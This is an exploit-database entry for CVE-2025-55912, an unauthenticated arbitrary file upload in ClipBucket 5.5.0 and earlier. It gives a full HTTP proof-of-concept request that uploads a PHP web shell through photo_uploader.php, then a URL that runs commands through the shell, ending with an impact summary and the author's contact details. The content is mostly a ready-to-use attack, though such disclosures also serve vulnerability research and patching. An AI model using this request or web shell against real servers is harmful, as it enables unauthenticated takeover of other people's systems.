ClipBucket 5.5.0 - Arbitrary File Upload

Author: Mukundsinh Solanki (r00td3str0y3r)
type: remote
platform: multiple
port: 
date_added: 2025-09-16  
date_updated: 2025-09-16  
verified: 0  
codes: CVE-2025-55912  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 52435.txt  

# Exploit Title: ClipBucket 5.5.0 - Arbitrary File Upload

# Google Dork: N/A

# Date: 2025-09-11

# Exploit Author: Mukundsinh Solanki (r00td3str0y3r)

# Vendor Homepage: https://clipbucket.com

# Software Link: https://github.com/MacWarrior/clipbucket-v5

# Version: <= 5.5.0

# Tested on: Ubuntu 20.04 LTS, PHP 7.4

# CVE: CVE-2025-55912

## Vulnerability Description:
ClipBucket <= 5.5.0 suffers from an unauthenticated arbitrary file upload
vulnerability in `upload/actions/photo_uploader.php`. Missing access
controls and insufficient validation of uploaded files allow an attacker to
upload a crafted PHP file and execute it remotely, leading to full remote
code execution (RCE).

## PoC Request:

POST /upload/actions/photo_uploader.php HTTP/1.1
Host: victim.com
Content-Type: multipart/form-data; boundary=----BOUND

------BOUND
Content-Disposition: form-data; name="Filedata"; filename="shell.php"
Content-Type: application/x-php

<?php system($_GET['cmd']); ?>
------BOUND--


The file is uploaded without authentication. The attacker can then access
it:


http://victim.com/files/photos/shell.php?cmd=id


## Impact:
- Unauthenticated remote code execution (RCE)
- Full compromise of target application and underlying server

Regards,
Mukundsinh Solanki
+916355251151